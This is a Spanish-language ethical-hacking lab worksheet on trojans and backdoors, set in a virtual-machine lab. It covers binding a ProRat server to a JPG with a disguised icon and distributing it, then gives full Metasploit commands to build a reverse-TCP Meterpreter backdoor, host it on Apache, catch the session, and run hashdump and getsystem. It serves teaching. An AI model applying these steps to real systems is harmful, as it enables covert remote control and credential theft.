Práctica de Hacking Ético Trojanos y Backdoors Objetivo: Observar el funcionamiento y la forma de distribución de software malicioso. Requisitos: • Máquina Virtual llamada STIT-WinXP (usuario: administrador; contraseña: user) • Máquina Virtual llamada STIT-Win2K3 (usuario: administrador; contraseña: user) • Máquina Virtual llamada BT5-STIT (usuario: root; contraseña: toor) Usuario adicional Windows: Usuario: prueba1; Contraseña: QAZ123wsx456 1. Instalación de ProRat: ProRat es una herramienta bastante completa que siempre que se logre distribuir y se mantenga activa en la máquina víctima, permitirá tener acceso y controlar dispositivos. En el escritorio de la máquina STIT-WinXP, entre en la carpeta ProRat y ejecute el archivo ProRat.exe
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Práctica de Hacking Ético
Trojanos y Backdoors
Objetivo: Observar el funcionamiento y la forma de distribución de software malicioso.
1. Instalación de ProRat: ProRat es una herramienta bastante completa que siempre que se logre distribuir y se mantenga activa en la máquina víctima, permitirá tener acceso y controlar dispositivos. En el escritorio de la máquina STIT-WinXP, entre en la carpeta ProRat y ejecute el archivo ProRat.exe
Seleccione Create > Create ProRat Server (342 Kbayt) para configurar la aplicación
En la ventana de creación del servidor, haga clic en General Settings y ajuste los parámetros según desee. Puede dejar los valores de Server Port, Server Password y VictimName por defecto. Luego asegúrese de deshabilitar las opciones mostradas en la imagen:
Seleccione la opción Bind with File. Luego, habilite la opción Bind server with a file, haga clic en Select File y búsque un archivo llamado Hermoso.jpg ubicado en el escritorio. Se desplegará un mensaje indicando que el servidor fue enlazado con el archivo seleccionado. Haga clic en OK.
Vaya a la opción Server Extensions y asegúrese de que la opción EXE (Has icon support) esté seleccionada
Ahora, haga clic en Server Icon y seleccione el icono de su preferencia y haga clic en Create Server. Luego de unos instantes recibirá un mensaje indicando que el servidor fue creado y que fue alojado en el directorio desde donde se ejecutó el ProRat.
Distribuya el archivo creado hacia la máquina STIT-Win2K3. Puede utilizar las carpetas compartidas que existen en el servidor. Desde la máquina STIT-WinXP vaya a Start > Run y ejecute \\192.168.37.2 En caso de que solicite credenciales puede utilizar: Usuario: stit-test.com\administrador Contraseña: user Luego coloque el archivo generado anteriormente en la carpeta llamada Compartida Desde el escritorio de la máquina virtual STIT-Win2K3, entre en la carpeta llamada Compartida y haga doble clic en el archivo generado. Se desplegará la imagen. Deje la imagen abierta y vuelva a la máquina STIT-WinXP. En la ventana del ProRat, especifique la dirección IP del servidor STIT-Win2K3 (192.168.37.2) haga clic en Connect y se le solicitará una contraseña (que si dejó los valores por defecto será 123456)
Verifique que la conexión fue exitosa observando el mensaje en la esquina inferior izquiera de la ventana del ProRat
Una vez conectado, haga clic en PC Info en el menú de la izquierda y luego en System Information para visualizar información de la máquina.
Explore libremente otras opciones del menú ProRat tales como Applications, Services, File Manager y Funny Stuff
2. Creación de Trojano™ con Metasploit: En esta sección se creará un software malicioso empleando un payload de Metasploit, que al ejecutarse en una máquina Windows, creará una conexión hacia la máquina del atacante.
Para crear el programa malicioso inicie la máquina BT5-STIT. Asegúrese de que la dirección IP de la máquina es 192.168.37.50. Puede verificarlo con el comando ifconfig En caso de que la dirección IP no sea la especificada, utilice el siguiente comendo para configurarla: ifconfig eth0 192.168.37.50 netmask 255.255.255.0 Una vez los parámetros de red estén configurados, abra una ventana de terminal y ejecute el comando msfconsole y espere unos segundos a que la consola de Metasploit cargue por completo.
Luego, ejecute el siguiente comendo: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.37.50 X > Desktop/backdoor.exe (Todo el comando el comando va en una sola línea. Luego de la dirección IP hay un espacio y luego la letra “X” en mayúscula)
Ahora, se habilitará un servidor apache en la máquina BT5-STIT para distribuir el software malicioso. Des un terminal, cree un directorio utilizando el comando: mkdir /var/www/share
Cambie los permisos del directorio creado con el siguiente comando: chmod –R 755 /var/www/share
Cambie el ownership de este directorio a www-data ejecutando: chown –R www-data:www-data /var/www/share
Verifique que los cambios se han aplicado ejecutando: ls –la /var/www/ | grep share
Inicie el servidor apache con el siguiente comando: service apache2 start
Copie el programa malicioso en el directorio creado con el comando: cp /root/Desktop/backdoor.exe /var/www/share
Inicie el manejador de sesiones de Metasploit, que será el encargado de recibir la conexión de la máquina víctima al ejecutar el software malicioso. Esto se logra ejecutando el siguiente procedimiento desde la consola de Metasploit: Cargue el handler ejecutando: use exploit/multi/handler
Cargue el payload correspondiente ejecutando: set payload windows/meterpreter/reverse_tcp
Configure el payload cargado anteriormente con la dirección IP de la máquina del atacante, esto se logra ejecutando: set lhost 192.168.37.50
Verifique que la configuración está correcta ejecutando: show options
Active el manejador de sesiones (handler) ejecutando: exploit –j -z
Desde la máquina STIT-Win2K3, abra un navegador y entre en el siguiente URL: http://192.168.37.50/share
Descargue el archivo backdoor.exe y ejecútelo. Es posible que deba agregar el URL a la lista de sitios permitidos del Internet Explorer. Desde la máquina BT5-STIT, verifique que el manejador de sesiones de Metasploit recibió la conexión.
Interactúe con esta sesión con el comando: sessions –i <N° de sesión> donde N° de sesión dependerá de la cantidad de sesiones detectadas por el manejador
Ejecute el comando help y observe la lista de comandos de meterpreter disponibles. Explore multiples opciones tales como:
• Idletime • Hashdump • Getsystem • Sysinfo
Responda las siguientes preguntas:
¿Es posible utilizar el meterpreter como un Keylogger? ¿Cómo se configuraría o se activaría?